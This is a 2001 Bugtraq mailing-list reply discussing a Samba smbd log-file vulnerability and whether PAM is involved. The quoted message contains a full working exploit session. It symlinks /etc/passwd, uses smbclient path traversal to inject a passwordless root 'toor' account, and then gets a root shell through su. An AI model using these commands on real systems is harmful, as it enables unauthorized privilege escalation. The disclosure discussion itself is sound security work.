[21225] in bugtraq
Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (Joachim Blaabjerg)
Wed Jun 27 20:11:41 2001
Date: Tue, 26 Jun 2001 11:08:04 +0200
From: Joachim Blaabjerg <styx@mailbox.as>
To: bugtraq@securityfocus.com
Message-Id: <20010626110804.58491b4c.styx@mailbox.as>
In-Reply-To: <20010625190919.A13420@hq.alert.sk>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Pavol Luptak <wilder@hq.alert.sk> wrote:
>
> [wilder@lysurus wilder]$ cat /etc/redhat-release
> Linux Mandrake release 8.0 (Traktopel) for i586
> [wilder@lysurus wilder]$ rpm -q pam
> pam-0.74-6mdk
> [wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf
> # this tells Samba to use a separate log file for each machine
> log file = /var/log/samba/%m.log (= changed from default log.%m)
> # Put a capping on the size of the log files (in Kb).
> [wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd
> samba-2.0.9-1.3mdk
> [wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
> [wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print
"\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
> added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0
> Anonymous login successful
> Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
> [wilder@lysurus wilder]$ tail /etc/passwd
> ..
> ..
> [2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
> Rejecting user 'wilder': authentication failed
> [2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
> ../../../tmp/x (127.0.0.1) couldn't find service
> toor::0:0::/:/bin/sh
> [wilder@lysurus wilder]$ su toor
> [root@lysurus wilder]#
>
> Appending to /etc/passwd has nothing to do with pam.
No, not directly, but if your `su` uses PAM to authenticate users and PAM
reacts to the spaces in the beginning of the passwd file, it surely has
something to do with PAM. To check whether `su` uses PAM or not, try "ldd
`which su`|grep libpam"
<snip>
Regards
--
Joachim Blaabjerg
styx@mailbox.as
www.SuxOS.org
